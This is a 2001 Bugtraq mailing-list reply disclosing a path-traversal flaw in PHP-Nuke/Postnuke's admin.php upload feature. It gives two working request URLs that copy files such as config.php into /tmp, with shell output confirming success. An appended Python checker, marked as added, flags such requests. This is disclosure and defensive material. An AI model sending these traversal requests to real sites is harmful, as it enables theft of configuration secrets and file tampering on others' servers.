[22730] in bugtraq
Re: twlc advisory: all versions of php nuke are vulnerable...
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Tue Sep 25 13:22:02 2001
Message-ID: <3BB06D35.595F93A3@starzetz.de>
Date: Tue, 25 Sep 2001 13:40:37 +0200
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: supergate@twlc.net,
"bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
supergate@twlc.net wrote:
> Summary
> This time the bug is really dangerous...it allows you to 'cp' any file on
> the box... or even upload files...
and even copy outside the postnuke path:
http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt
or for example:
http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&userfile=/../../../../../../../tmp/copyme.txt&userfile_name=/../../../../../../../tmp/hacked.txt
root@somehost:/tmp > ls -la
total 20
drwxrwxrwt 8 root root 2048 Sep 25 13:37 .
drwxr-xr-x 19 root root 2048 Feb 28 2001 ..
drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix
-rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt
-rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt
...
Postnuke breaks with elementary secure coding practices...
/ihq
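
A defender-side check for the requests shown above, as an added example that is not part of the original post or of the PHP-Nuke/Postnuke code: it resolves the destination an admin.php upload request names and reports whether it stays under the intended upload directory. UPLOAD_ROOT, the function names, the benign third URL, and the treatment of a query-string userfile as suspicious are assumptions made for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumption: directory the upload feature is meant to write into (not from the post).
UPLOAD_ROOT = "/srv/www/nukepath"

def resolve_under_root(root, *parts):
    """Join parts onto root the way string concatenation would, normalise
    lexically, and return the result, or None if it leaves root.
    Lexical only: symlinks are not followed."""
    path = posixpath.normpath(posixpath.join(root, *(p.lstrip("/") for p in parts)))
    inside = path == root or path.startswith(root.rstrip("/") + "/")
    return path if inside else None

def check_request(url):
    """Return a list of findings for one admin.php upload request URL."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if q.get("upload") != ["1"]:
        return []
    wdir = q.get("wdir", [""])[0]
    name = q.get("userfile_name", [""])[0]
    findings = []
    if resolve_under_root(UPLOAD_ROOT, wdir) is None:
        findings.append("wdir escapes upload root")
    if "/" in name or "\\" in name or name in ("", ".", ".."):
        findings.append("userfile_name is not a bare file name")
    # Assumption: a genuine upload carries the file in the POST body, so a
    # 'userfile' value in the query string is treated as suspicious.
    if "userfile" in q:
        findings.append("userfile supplied in query string")
    return findings

# The two request URLs from the post, plus one constructed benign request.
SAMPLES = [
    "http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt"
    "&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt",
    "http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp"
    "&userfile=/../../../../../../../tmp/copyme.txt"
    "&userfile_name=/../../../../../../../tmp/hacked.txt",
    "http://somehost/nukepath/admin.php?upload=1&wdir=/images/&userfile_name=logo.gif",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(check_request(u) or "ok", u[:60])
```

The same containment test belongs in the server-side handler before any copy is performed; run over access logs it only identifies requests that have already been made.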